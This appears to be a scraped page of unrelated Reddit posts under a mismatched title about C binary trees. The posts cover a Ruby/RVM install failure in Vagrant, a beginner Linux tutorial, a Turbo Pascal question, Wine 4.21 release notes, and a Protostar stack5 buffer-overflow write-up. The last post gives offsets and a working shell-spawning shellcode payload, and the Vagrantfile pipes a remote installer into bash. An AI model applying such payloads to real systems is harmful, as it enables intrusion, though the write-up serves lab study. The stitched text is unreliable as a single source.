c - Parsing a read in file and storing it in a binary tree

Ruby in Vagrant setup HELP!!

Hi there. I've been having this issue a while now. I graduated bootcamp and they used vagrant for teaching Rails development. That's what I'm used to. But I wanted to try to make my own Vagrant box to start my personal development environment instead of using the one the bootcamp provided. And the first project is going to be my Web Dev portfolio in Ruby on Rails.
Well now I'm running into issues installing the latest ruby version (or even the recommented one if you don't know what your'e doing which is 2.6.6 with devkit. (Not sure how I'd go about manually installing ruby with devkit in ubuntu from the terminal.)
I'm at the point where I'm ssh'd into my Vagrant box, and I'm trying to run the command rvm install 2.7.1 and it's throwing an error at me. I'm not sure how to determine exactly what's wrong, but here's the output after that command:
[email protected]:~$ rvm install 2.7.1 Searching for binary rubies, this might take some time. Found remote file https://rvm_io.global.ssl.fastly.net/binaries/ubuntu/18.04/x86_64/ruby-2.7.1.tar.bz2 Checking requirements for ubuntu. Requirements installation successful. ruby-2.7.1 - #configure ruby-2.7.1 - #download Downloaded archive checksum did not match! ruby-2.7.1 - #validate archive bzip2: Data integrity error when decompressing. Input file = (stdin), output file = (stdout) It is possible that the compressed file(s) have become corrupted. You can use the -tvv option to test integrity of such files. You can use the `bzip2recover' program to attempt to recover data from undamaged sections of corrupted files. tar: Child returned status 2 tar: Error is not recoverable: exiting now bzip2: Data integrity error when decompressing. Input file = (stdin), output file = (stdout) It is possible that the compressed file(s) have become corrupted. You can use the -tvv option to test integrity of such files. You can use the `bzip2recover' program to attempt to recover data from undamaged sections of corrupted files. tar: Child returned status 2 tar: Error is not recoverable: exiting now bzip2: Data integrity error when decompressing. Input file = (stdin), output file = (stdout) It is possible that the compressed file(s) have become corrupted. You can use the -tvv option to test integrity of such files. You can use the `bzip2recover' program to attempt to recover data from undamaged sections of corrupted files. tar: Child returned status 2 tar: Error is not recoverable: exiting now The downloaded package for https://rvm_io.global.ssl.fastly.net/binaries/ubuntu/18.04/x86_64/ruby-2.7.1.tar.bz2, Does not contains single 'bin/ruby' or 'ruby-2.7.1', Only '' were found instead. Mounting remote ruby failed with status 4, trying to compile. Checking requirements for ubuntu. Requirements installation successful. Installing Ruby from source to: /home/vagrant/.rvm/rubies/ruby-2.7.1, this may take a while depending on your cpu(s)... ruby-2.7.1 - #downloading ruby-2.7.1, this may take a while depending on your connection... Downloaded archive checksum did not match! ruby-2.7.1 - #extracting ruby-2.7.1 to /home/vagrant/.rvm/src/ruby-2.7.1...... Error running '__rvm_package_extract /home/vagrant/.rvm/archives/ruby-2.7.1.tar.bz2 /home/vagrant/.rvm/tmp/rvm_src_2151', please read /home/vagrant/.rvm/log/1593047102_ruby-2.7.1/extract.log There has been an error while trying to extract the source. Halting the installation. There has been an error fetching the ruby interpreter. Halting the installation. [email protected]:~$ 
Here is my Vagrantfile, also. Pretty basic:
Vagrant.configure("2") do |config| config.vm.box = "ubuntu/bionic64" config.vm.network "forwarded_port", guest: 3000, host: 3000 config.vm.provision "shell", privileged: false, inline: <<-SHELL echo "==> Installing RVM..." # https://rvm.io/rvm/install curl -sSL https://rvm.io/mpapis.asc | gpg --import - curl -sSL https://rvm.io/pkuczynski.asc | gpg --import - curl -sSL https://get.rvm.io | bash -s stable source "$HOME/.rvm/scripts/rvm" rvm install 2.6.6 gem install rails SHELL 
config.vm.synced_folder ".", "/vagrant_files" config.vm.provider "virtualbox" do |vb| vb.memory = "4096" end config.vm.provider "virtualbox" do |vb| vb.cpus = 8 end end
Any help will be greatly appreciated. I've been trying to get help on this and this is the furthest so far I think I've gotten besides this - I did get ruby and rails to install by running sudo apt-install ruby, which gives me a really old version, and then the same with Rails when I try to install that the same way, it gives me version 4.something when it's pas 6.0.3!
If I could just get a newer version of ruby working and I can install rails, then I'm set!
submitted by kylespartan626 to ruby [link] [comments]

Having trouble installing RVM/Ruby in my first Vagrant Box

Hello. I'm in desperate need of help with this. So I haven't done much on my own outside of my coding bootcamp I graduated from yet. They had me download a set of files that included everything set up for Vagrant. But I wanted to recreate the environment for myself so that everything came from me and doesn't have any files related to the bootcamp anymore.
I'm going through the tutorial of just creating the folder you want your code environment in, running the vagrant init command int he terminal and creating everything that way. I'm at the point of installing RVM and Ruby, specifically 2.7.1 which is the latest as of the time of this post. I'm getting an error though.
Here's the output when I run "rvm install ruby-2.7.1":
Searching for binary rubies, this might take some time. Found remote file https://rvm_io.global.ssl.fastly.net/binaries/ubuntu/18.04/x86_64/ruby-2.7.1.tar.bz2 Checking requirements for ubuntu. Requirements installation successful. ruby-2.7.1 - #configure ruby-2.7.1 - #download % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 21.0M 100 21.0M 0 0 23.7M 0 --:--:-- --:--:-- --:--:-- 23.7M Downloaded archive checksum did not match! ruby-2.7.1 - #validate archive bzip2: Data integrity error when decompressing. Input file = (stdin), output file = (stdout) It is possible that the compressed file(s) have become corrupted. You can use the -tvv option to test integrity of such files. You can use the `bzip2recover' program to attempt to recover data from undamaged sections of corrupted files. tar: Unexpected EOF in archive tar: Error is not recoverable: exiting now bzip2: Data integrity error when decompressing. Input file = (stdin), output file = (stdout) It is possible that the compressed file(s) have become corrupted. You can use the -tvv option to test integrity of such files. You can use the `bzip2recover' program to attempt to recover data from undamaged sections of corrupted files. tar: Unexpected EOF in archive tar: Error is not recoverable: exiting now ruby-2.7.1 - #extract bzip2: Data integrity error when decompressing. Input file = (stdin), output file = (stdout) It is possible that the compressed file(s) have become corrupted. You can use the -tvv option to test integrity of such files. You can use the `bzip2recover' program to attempt to recover data from undamaged sections of corrupted files. tar: Unexpected EOF in archive tar: Unexpected EOF in archive tar: Error is not recoverable: exiting now Unpacking bin-ruby-2.7.1.tar.bz2 failed. Mounting remote ruby failed with status 6, trying to compile. Checking requirements for ubuntu. Requirements installation successful. Installing Ruby from source to: /usshare/rvm/rubies/ruby-2.7.1, this may take a while depending on your cpu(s)... ruby-2.7.1 - #downloading ruby-2.7.1, this may take a while depending on your connection... % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 14.0M 100 14.0M 0 0 26.0M 0 --:--:-- --:--:-- --:--:-- 26.0M Downloaded archive checksum did not match! ruby-2.7.1 - #extracting ruby-2.7.1 to /usshare/rvm/src/ruby-2.7.1...... Error running '__rvm_package_extract /usshare/rvm/archives/ruby-2.7.1.tar.bz2 /usshare/rvm/tmp/rvm_src_3269', please read /home/vagrant/.rvm/log/1591896051_ruby-2.7.1/extract.log There has been an error while trying to extract the source. Halting the installation. There has been an error fetching the ruby interpreter. Halting the installation. 
I just need to try and get this fixed so I can continue to work on my Web Dev portfolio which is based on Ruby on Rails. I'm just not understanding why I'm now having all this trouble with my development environment when using the files that the bootcamp gave me is fine. It's just that those install older versions of ruby and rails and stuff and I want the latest working versions of everything. Any help is greatly appreciated.
submitted by kylespartan626 to vagrant [link] [comments]

Linux/Unix for beginners. tutorial 1 (cont 1)

If you find this helpful. Please kindly upvote and follow to keep you updated on the next tutorials
In this tutorial will introduce the Linux OS and compare it with Windows.
Windows Vs. Linux: File System
Linux Types of Files
Windows Vs. Linux: Users
Windows Vs. Linux: File Name Convention
Windows Vs. Linux: HOME Directory
Windows Vs. Linux: Other Directories
Windows Vs. Linux: Key Differences
Windows Vs. Linux File System
In Microsoft Windows, files are stored in folders on different data drives like C: D: E:
But, in Linux, files are ordered in a tree structure starting with the root directory.
This root directory can be considered as the start of the file system, and it further branches out various other subdirectories. The root is denoted with a forward slash '/'.
A general tree file system on your UNIX may look like this.

Types of Files
In Linux and UNIX, everything is a file. Directories are files, files are files, and devices like Printer, mouse, keyboard etc.are files.
Let's look into the File types in more detail.
General Files
General Files also called as Ordinary files. They can contain image, video, program or simply text. They can be in ASCII or a Binary format. These are the most commonly used files by Linux Users.
Directory Files
These files are a warehouse for other file types. You can have a directory file within a directory (sub-directory).You can take them as 'Folders' found in Windows operating system.
Device Files:
In MS Windows, devices like Printers, CD-ROM, and hard drives are represented as drive letters like G: H:. In Linux, there are represented as files.For example, if the first SATA hard drive had three primary partitions, they would be named and numbered as /dev/sda1, /dev/sda2 and /dev/sda3.
Note: All device files reside in the directory /dev/
All the above file types (including devices) have permissions, which allow a user to read, edit or execute (run) them. This is a powerful Linux/Unix feature. Access restrictions can be applied for different kinds of users, by changing permissions.
Windows Vs. Linux: Users
There are 3 types of users in Linux.
Regular
Administrative(root)
Service
Regular User
A regular user account is created for you when you install Ubuntu on your system. All your files and folders are stored in /home/ which is your home directory. As a regular user, you do not have access to directories of other users.
Root User
Other than your regular account another user account called root is created at the time of installation. The root account is a superuser who can access restricted files, install software and has administrative privileges. Whenever you want to install software, make changes to system files or perform any administrative task on Linux; you need to log in as a root user. Otherwise, for general tasks like playing music and browsing the internet, you can use your regular account.
Service user
Linux is widely used as a Server Operating System. Services such as Apache, Squid, email, etc. have their own individual service accounts. Having service accounts increases the security of your computer. Linux can allow or deny access to various resources depending on the service.
Note:
You will not see service accounts in Ubuntu Desktop version.
Regular accounts are called standard accounts in Ubuntu Desktop
In Windows, there are 4 types of user account types.
Administrator
Standard
Child
Guest
Windows Vs. Linux: File Name Convention
In Windows, you cannot have 2 files with the same name in the same folder. See below -

While in Linux, you can have 2 files with the same name in the same directory, provided they use different cases.

Windows Vs. Linux: HOME Directory
For every user in Linux, a directory is created as /home/
Consider, a regular user account "Tom". He can store his personal files and directories in the directory "/home/tom". He can't save files outside his user directory and does not have access to directories of other users. For instance, he cannot access directory "/home/jerry" of another user account"Jerry".
The concept is similar to C:\Documents and Settings in Windows.
When you boot the Linux operating system, your user directory (from the above example /home/tom) is the default working directory. Hence the directory "/home/tom is also called the Home directory which is a misnomer.
The working directory can be changed using some commands which we will learn later.
Windows Vs. Linux: Other Directories
In Windows, System and Program files are usually saved in C: drive. But, in Linux, you would find the system and program files in different directories. For example, the boot files are stored in the /boot directory, and program and software files can be found under /bin, device files in /dev. Below are important Linux Directories and a short description of what they contain.

These are most striking differences between Linux and other Operating Systems. There are more variations you will observe when switching to Linux and we will discuss them as we move along in our tutorials.
Windows Vs. Linux:
WindowsLinuxWindows uses different data drives like C: D: E to stored files and folders.Unix/Linux uses a tree like a hierarchical file system.Windows has different drives like C: D: EThere are no drives in LinuxHard drives, CD-ROMs, printers are considered as devicesPeripherals like hard drives, CD-ROMs, printers are also considered files in Linux/UnixThere are 4 types of user account types 1) Administrator, 2) Standard, 3) Child, 4) GuestThere are 3 types of user account types 1) Regular, 2) Root and 3) Service AccountAdministrator user has all administrative privileges of computers.Root user is the super user and has all administrative privileges.In Windows, you cannot have 2 files with the same name in the same folderLinux file naming convention is case sensitive. Thus, sample and SAMPLE are 2 different files in Linux/Unix operating system.In windows, My Documents is default home directory.For every user /home/username directory is created which is called his home directory.
KEY DIFFERENCE
Linux is an open source operating system so user can change source code as per requirement whereas Windows OS is a commercial operating system so user doesn’t have access to source code.
Linux is very well secure as it is easy to detect bugs and fix whereas Windows has a huge user base, so it becomes a target of hackers to attack windows system.
Linux runs faster even with older hardware whereas windows are slower compared to Linux.
Linux peripherals like hard drives, CD-ROMs, printers are considered files whereas Windows, hard drives, CD-ROMs, printers are considered as devices
Linux files are ordered in a tree structure starting with the root directory whereas in Windows, files are stored in folders on different data drives like C: D: E:
In Linux you can have 2 files with the same name in the same directory while in Windows, you cannot have 2 files with the same name in the same folder.
In Linux you would find the system and program files in different directories whereas in Windows, system and program files are usually saved in C: drive.
Linux Command Line Tutorial: Manipulate Terminal with CD Commands
The most frequent tasks that you perform on your PC is creating, moving or deleting Files. Let's look at various options for File Management.
To manage your files, you can either use
Terminal (Command Line Interface - CLI)
File manager (Graphical User Interface -GUI)
In this tutorial, you will learn-
Why learn Command Line Interface?
Launching the CLI on Ubuntu
Present working Directory (pwd)
Changing Directories (cd)
Navigating to home directory (cd ~)
Moving to root directory (cd /)
Navigating through multiple directories
Moving up one directory level (cd ..)
Relative and Absolute Paths
Click here if the video is not accessible
Why learn Command Line Interface?
Even though the world is moving to GUI based systems, CLI has its specific uses and is widely used in scripting and server administration. Let's look at it some compelling uses -
Comparatively, Commands offer more options & are flexible. Piping and stdin/stdout are immensely powerful are not available in GUI
Some configurations in GUI are up to 5 screens deep while in a CLI it's just a single command
Moving, renaming 1000's of the file in GUI will be time-consuming (Using Control /Shift to select multiple files), while in CLI, using regular expressions so can do the same task with a single command.
CLI load fast and do not consume RAM compared to GUI. In crunch scenarios this matters.
Both GUI and CLI have their specific uses. For example, in GUI, performance monitoring graphs give instant visual feedback on system health, while seeing hundreds of lines of logs in CLI is an eyesore.
You must learn to use both GUI(File Manager) and CLI (Terminal)
GUI of a Linux based OS is similar to any other OS. Hence, we will focus on CLI and learn some useful commands.
Launching the CLI on Ubuntu
There are 2 ways to launch the terminal.
1) Go to the Dash and type terminal

2) Or you can press CTRL + Alt + T to launch the Terminal
Once you launch the CLI (Terminal), you would find something as [email protected](see image) written on it.

1) The first part of this line is the name of the user (bob, tom, ubuntu, home...)
2) The second part is the computer name or the host name. The hostname helps identify a computer over the network. In a server environment, host-name becomes important.
3) The ':' is a simple separator
4) The tilde '~' sign shows that the user in working in the home directory. If you change the directory, this sign will vanish.

In the above illustration, we have moved from the /home directory to /bin using the 'cd' command. The ~ sign does not display while working in /bin directory. It appears while moving back to the home directory.
5) The '$' sign suggests that you are working as a regular user in Linux. While working as a root user, '#' is displayed.

Present Working Directory
The directory that you are currently browsing is called the Present working directory. You log on to the home directory when you boot your PC. If you want to determine the directory you are presently working on, use the command -
pwd

pwd command stands for print working directory
Above figure shows that /home/guru99 is the directory we are currently working on.
Changing Directories
If you want to change your current directory use the 'cd' command.
cd /tem
Consider the following example.

Here, we moved from directory /tmp to /bin to /usr and then back to /tmp.
Navigating to home directory
If you want to navigate to the home directory, then type cd.

cd
You can also use the cd ~ command.

cd ~
Moving to root directory
The root of the file system in Linux is denoted by '/'. Similar to 'c:\' in Windows.
Note: In Windows, you use backward slash "\" while in UNIX/Linux, forward slash is used "/"
Type 'cd /' to move to the root directory.
cd /

TIP: Do not forget space between cd and /. Otherwise, you will get an error.
Navigating through multiple directories
You can navigate through multiple directories at the same time by specifying its complete path.
Example: If you want to move the /cpu directory under /dev, we do not need to break this operation in two parts.
Instead, we can type '/dev/cpu' to reach the directory directly.
cd /dev/cpu

Moving up one directory level
For navigating up one directory level, try.
cd ..

Here by using the 'cd ..' command, we have moved up one directory from '/dev/cpu' to '/dev'.
Then by again using the same command, we have jumped from '/dev' to '/' root directory.
Relative and Absolute Paths
A path in computing is the address of a file or folder.
Example - In Windows
C:\documentsandsettings\user\downloadsIn Linux/home/usedownloads
There are two kinds of paths:
  1. Absolute Path:
Let's say you have to browse the images stored in the Pictures directory of the home folder 'guru99'.
The absolute file path of Pictures directory /home/guru99/Pictures
To navigate to this directory, you can use the command.
cd /home/guru99/Pictures

This is called absolute path as you are specifying the full path to reach the file.
  1. Relative Path:
The Relative path comes in handy when you have to browse another subdirectory within a given directory.
It saves you from the effort to type complete paths all the time.
Suppose you are currently in your Home directory. You want to navigate to the Downloads directory.
You do no need to type the absolute path
cd /home/guru99/Downloads

Instead, you can simply type 'cd Downloads' and you would navigate to the Downloads directory as you are already present within the '/home/guru99' directory.
cd Downloads
This way you do not have to specify the complete path to reach a specific location within the same directory in the file system.
Summary:
To manage your files, you can use either the GUI(File manager) or the CLI(Terminal) in Linux. Both have its relative advantages. In the tutorial series, we will focus on the CLI aka the Terminal
You can launch the terminal from the dashboard or use the shortcut key Cntrl + Alt + T
The pwd command gives the present working directory.
You can use the cd command to change directories
Absolute path is complete address of a file or directory
Relative path is relative location of a file of directory with respect to current directory
Relative path help avoid typing complete paths all the time.
Command
Description
cd or cd ~
Navigate to HOME directory
cd ..
Move one level up
cd
To change to a particular directory
cd /
Move to the root directory
If you find this helpful. Kindly upvote and follow to keep you updated on the next posts.
submitted by bogolepov to Hacking_Tutorials [link] [comments]

Turbo pascal 7.0 question

[Resolved]
Is it possible to convert Input (=stdin) from Text to generic File so that I could use blockread() with it?
As far the only option to read binary data from Input to me is per-character read(ch: char) which gonna be kinda slow I guess (I use settextbuf() with a 4k buffer to reduce actual reads but still it is an extra function call for each byte).
submitted by flakebloom to pascal [link] [comments]

Wine 4.21 Released

The Wine development release 4.21 is now available.
 
https://www.winehq.org/announce/4.21 
 
What's new in this release (see below for details):
 
- HTTP proxy configuration through DHCP. - Parameter block support in D3DX9. - A few more dlls converted to PE. - Various bug fixes. 
 
The source is available from the following locations:
http://dl.winehq.org/wine/source/4.x/wine-4.21.tar.xz http://mirrors.ibiblio.org/wine/source/4.x/wine-4.21.tar.xz 
 
Binary packages for various distributions will be available from:
http://www.winehq.org/download 
 
You will find documentation on
http://www.winehq.org/documentation 
 
You can also get the current source directly from the git repository.
Check
http://www.winehq.org/git for details. 
 
Wine is available thanks to the work of many people.
See the file AUTHORS in the distribution for the complete list.
 
 
Bugs fixed in 4.21 (total 50):
 
15670 .NET applications that make use of System.IO.IsolatedStorage crash (missing "HKLM\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\ " registry subkey) 22030 LegoLand: crashes at main menu without native directmusic 23729 Need For Speed: Shift - throbbing glob around language and save game name not as noticable on Wine 23821 Super Mario Brothers X hangs in quartz? 25264 treeview wstr overrun in TVN_GETDISPINFOW (ExamXML crashes when opening an XML file) 26119 kernel32/pipe tests show some valgrind warnings 26721 Button and Static controls not painting in Win NT V6.00 and later modes 28506 kernel32/change.ok test fails occasionally on linux 28602 Ccleaner: installer has a non-fatal crash 30499 Multiple Avira AVG product installers crash due to access of undocumented PEB field "UnicodeCaseTableData" (AVG Free Edition 2012-2014, TuneUp Utilities 2014) 33284 Xin Shendiao Xialv ("The Giant Eagle and It's Companion") has some graphical issues 33352 Family Tree Maker 2012 crashes when trying to start program 34048 IE8 x64 for Server 2003 exits silently 35252 Multiple applications need ITaskScheduler::Enum implementation (lsTasks, Toad for MySQL Freeware 7.x) 36121 valgrind leaks in ntdll/tests/change.c 36266 valgrind shows several leaks in dmusic/tests/dmusic.c 36404 valgrind shows a leak in faultrep/tests/faultrep.c 36405 valgrind shows a leak in msxml3/tests/xmlview.c 36615 valgrind shows a definite leak in mshtml/tests/htmldoc.c 38300 using winegcc with stdin passes arguments in the wrong position to gcc 38659 Windows Sysinternals Process Explorer v16.x crashes on startup (registry SID profile data in 'ProfileList' must contain 'Flags' and 'ProfileImagePath' values) 39210 Dream Aquarium (screensaver) fails to read monitor power state ('{4d36e96e-e325-11ce-bfc1-08002be10318}' monitor device class registry data missing) 40970 Can't run LEGO DD anymore 43323 Beamng.drive: Cars render incorrectly 45661 Gothic 2 crashes with music enabled without native directmusic 46748 Splinter Cell: Blacklist shows some 'script code' instead of text 47414 valgrind shows a definite memory leak in dlls/ntdll/loader.c 47489 The appearance of configurable options in Audacity is broken 47547 Steam Overlay stopped working 47620 unimplemented function KERNEL32.dll.GetCurrentConsoleFontEx 47656 Crysis 1: game in DX10 cannot be started (also causing Very High graphical setting not available) in Vista and up 47724 .NET Framework 3.5 SP1 not installing 47740 dotnet20sp2: fails to install on arch and derivatives 47790 putty.exe displays an error at startup when placed in a path with accented characters. 47809 mscrt: strftime is missing some substutions 47832 FindFirstFileExW believes every directory entry has been read if NtQueryDirectoryFile underfills buffer 47935 Nextiva: Logging in fails with "Client is unable to connect to the server." 47991 motec i2 pro v1.0 data logger fails to start 48016 karafunplayer: Call from 0x7124d239 to unimplemented function shcore.dll.GetScaleFactorForMonitor, aborting 48072 Everquest Classic: Textures not working correctly 48087 Firestorm viewer can't login to Second Life grid since 4.19 48104 Graphics load improperly in LEGO Island 2 48111 myodbc-installer v5.x (part of Toad for MySQL Freeware 7.x) crashes when querying for installed drivers ('SQLGetInstalledDrivers' doesn't handle NULL 'sizeout') 48114 wine: could not open working directory L"unix\\home\\tod\\", starting in the Windows directory. 48140 Archicad 22 needs missing SHCreateDataObject from shell32 48157 SetThreadDescription() return value E_NOTIMPL crashes StarCitizen 48170 start.exe: /min no longer works 48176 cannot select drawn line in excel2003 sheet (for removal) 48178 upgrade to "version 4 stable" made EXCEL2003 unusable (even after re-installing/purging wine and EXCEL) 48188 wine fails to load, "kernelbase.dll" failed to initialize, aborting 
submitted by catulirdit to linux_gaming [link] [comments]

Protostar stack5 shellcode not working in the buffer (outside is ok)

Protostar Stack5 buffer overflow (32 bits shellcode)
I got a strange behaviour (strange maybe not BUT that I could not explain :-)
When I put the shellcode inside the buffer it does not work but when outside all is working fine.
It's protostart stack5 binary in it's original VM (constructed from Iso on linux 32 bits) so I would not give further info on the binary itself (stack is executable, ASLR is off, ....)
Let me explain and let's go with gdb !

Finding the buffer overflow
gdb$ disass _start Dump of assembler code for function _start: 0x08048310 <_start+0>: xor ebp,ebp 0x08048312 <_start+2>: pop esi 0x08048313 <_start+3>: mov ecx,esp 0x08048315 <_start+5>: and esp,0xfffffff0 0x08048318 <_start+8>: push eax 0x08048319 <_start+9>: push esp 0x0804831a <_start+10>: push edx 0x0804831b <_start+11>: push 0x80483e0 0x08048320 <_start+16>: push 0x80483f0 0x08048325 <_start+21>: push ecx 0x08048326 <_start+22>: push esi 0x08048327 <_start+23>: push 0x80483c4 # Real Entry point 0x0804832c <_start+28>: call 0x80482f8 <[email protected]> 0x08048331 <_start+33>: hlt 0x08048332 <_start+34>: nop 0x08048333 <_start+35>: nop (....) 
let's disass main
gdb$ disass main Dump of assembler code for function main: 0x080483c4 : push ebp # Prologue... 0x080483c5 : mov ebp,esp # ... 0x080483c7 : and esp,0xfffffff0 # ... adress alignement 0x080483ca : sub esp,0x50 # ... reserve space on stack 0x080483cd : lea eax,[esp+0x10] # adress start of buffer 0x080483d1 : mov DWORD PTR [esp],eax # put the arg on the stack 0x080483d4 : call 0x80482e8 [email protected] # call to gets (char*) 0x080483d9 : leave 0x080483da : ret End of assembler dump. 
Let's retrieve EBP adress and value:
gdb$ x/wx $ebp 0xbffff7b8: 0xbffff838 

Let's retrieve EIP address and it's value
gdb$ x/wx $ebp+0x4 0xbffff7bc: 0xb7eadc76 
Let's check EIP return adress to be sure we're fine:
gdb$ x/5i 0xb7eadc76 0xb7eadc76 <__libc_start_main+230>: mov DWORD PTR [esp],eax 0xb7eadc79 <__libc_start_main+233>: call 0xb7ec60c0 <*__GI_exit> 0xb7eadc7e <__libc_start_main+238>: xor ecx,ecx 0xb7eadc80 <__libc_start_main+240>: jmp 0xb7eadbc0 <__libc_start_main+48> 0xb7eadc85 <__libc_start_main+245>: mov eax,DWORD PTR [ebx+0x37d4] 
Good ! It's back on __libc_start_main.

Let's get the buffer (gets) start adress :
p/x $esp+0x10 $1 = 0xbffff770 

Write the most important values for our exploitation:
---Reminder------------------------------------------------------- RET EBP : 0xbffff7b8: 0xbffff838 RET EIP : 0xbffff7bc: 0xb7eadc76 buffer start adress: 0xbffff770 ----------------------------------------------------------------- 
Let's do some computation to overwrite EIP
# EIP's address - buffer's address # gdb$ p/d 0xbffff7bc - 0xbffff770 # $1 = 0x76 
We need 76 bytes then we can start to overwrite EIP ( + 4 byte for EIP )
python -c 'print "A"*72 + "BBBB" + "CCCC"' AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCC 
A is Padding B is EBP C is EIP

Let's try our buffer overflow !
./stack5 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCC dmesg [50576.044013] stack5[13898]: segfault at 43434343 ip 43434343 sp bffff7e0 error 4 
EIP has been overwritten and it is working fine (43 in ASCII => 'C') !

Shellcode Exploitation
We will use a well known and working shellcode :
https://security.stackexchange.com/questions/73878/program-exiting-after-executing-int-0x80-instruction-when-running-shellcode
shellcode is 58 bytes. We will construct our payload like that:
5 (NOP) + 58 (Shellcode) + 9 (PADDING-NOP) + 4 (EBP) + 4 (EIP) = 76 + 4 EIP bytes as computed 
Important : here I put the shellcode IN the buffer
r <<< $(python -c 'print "\x90"*5 + "\x83\xc4\x10\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" + "\x90"*9 + "\x38\xf8\xff\xbf" + "\x70\xf7\xff\xbf"') 
\x38\xf8\xff\xbf = EBP original adress = 0xbffff838
\x70\xf7\xff\xbf = overwritten EIP= buffer start adress = 0xbffff770

In GDB break juste before the ret instruction and check esp to be sure it will jump where we want
gdb$ x/wx $esp 0xbffff7bc: 0xbffff770 
Well this good for the next eip adress ! check to see if our shellcode is always there
x/30i 0xbffff770 0xbffff770: nop 0xbffff771: nop 0xbffff772: nop 0xbffff773: nop 0xbffff774: nop 0xbffff775: add esp,0x10 0xbffff778: xor eax,eax 0xbffff77a: xor ebx,ebx 0xbffff77c: mov al,0x6 0xbffff77e: int 0x80 0xbffff780: push ebx 0xbffff781: push 0x7974742f 0xbffff786: push 0x7665642f 0xbffff78b: mov ebx,esp 0xbffff78d: xor ecx,ecx 0xbffff78f: mov cx,0x2712 0xbffff793: mov al,0x5 0xbffff795: int 0x80 0xbffff797: xor eax,eax 0xbffff799: push eax 0xbffff79a: push 0x68732f2f 0xbffff79f: push 0x6e69622f 0xbffff7a4: mov ebx,esp 0xbffff7a6: push eax 0xbffff7a7: push ebx 0xbffff7a8: mov ecx,esp 0xbffff7aa: cdq 0xbffff7ab: mov al,0xb 0xbffff7ad: int 0x80 0xbffff7af: nop 
On GDB Perfect it is working !
gdb$ c Executing new program: /bin/dash $ 
out of GDB it is NOT working anymore:
same payload than in gdb
(python -c "import sys; sys.stdout.write('\x90'*5 + '\x83\xc4\x10\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80' + '\x90'*9 + '\x38\xf8\xff\xbf' + '\x70\xf7\xff\xbf')";) | ./stack5 
or (overwrite EBP)
(python -c "import sys; sys.stdout.write('\x90'*5 + '\x83\xc4\x10\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80' + '\x90'*13 + '\x70\xf7\xff\xbf')";) | ./stack5 
The only thing I get : Illegal instruction! Here a strace if it can help ...
execve("./stack5", ["./stack5"], [/* 16 vars */]) = 0 brk(0) = 0x804a000 fcntl64(0, F_GETFD) = 0 fcntl64(1, F_GETFD) = 0 fcntl64(2, F_GETFD) = 0 access("/etc/suid-debug", F_OK) = -1 ENOENT (No such file or directory) access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory) mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fe0000 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory) open("/etc/ld.so.cache", O_RDONLY) = 3 fstat64(3, {st_mode=S_IFREG|0644, st_size=13796, ...}) = 0 mmap2(NULL, 13796, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7fdc000 close(3) = 0 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory) open("/lib/libc.so.6", O_RDONLY) = 3 read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\320m\1\0004\0\0\0"..., 512) = 512 fstat64(3, {st_mode=S_IFREG|0755, st_size=1319176, ...}) = 0 mmap2(NULL, 1329480, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0xb7e97000 mprotect(0xb7fd5000, 4096, PROT_NONE) = 0 mmap2(0xb7fd6000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x13e) = 0xb7fd6000 mmap2(0xb7fd9000, 10568, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7fd9000 close(3) = 0 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7e96000 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7e966c0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0 mprotect(0xb7fd6000, 8192, PROT_READ) = 0 mprotect(0xb7ffe000, 4096, PROT_READ) = 0 munmap(0xb7fdc000, 13796) = 0 fstat64(0, {st_mode=S_IFIFO|0600, st_size=0, ...}) = 0 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fdf000 read(0, "\220\220\220\220\220\203\304\0201\3001\333\260\6\315\200Sh/ttyh/dev\211\3431\311f"..., 4096) = 80 read(0, "", 4096) = 0 --- SIGILL (Illegal instruction) @ 0 (0) --- +++ killed by SIGILL +++ Illegal instruction 
Questions / Others informations
I know there could be some adress change caused by ENVs vars but I do not think that is the problem... but I have no evidence.

Just for the exemple Shellcode After EIP (outside the buffer) : everything is OK
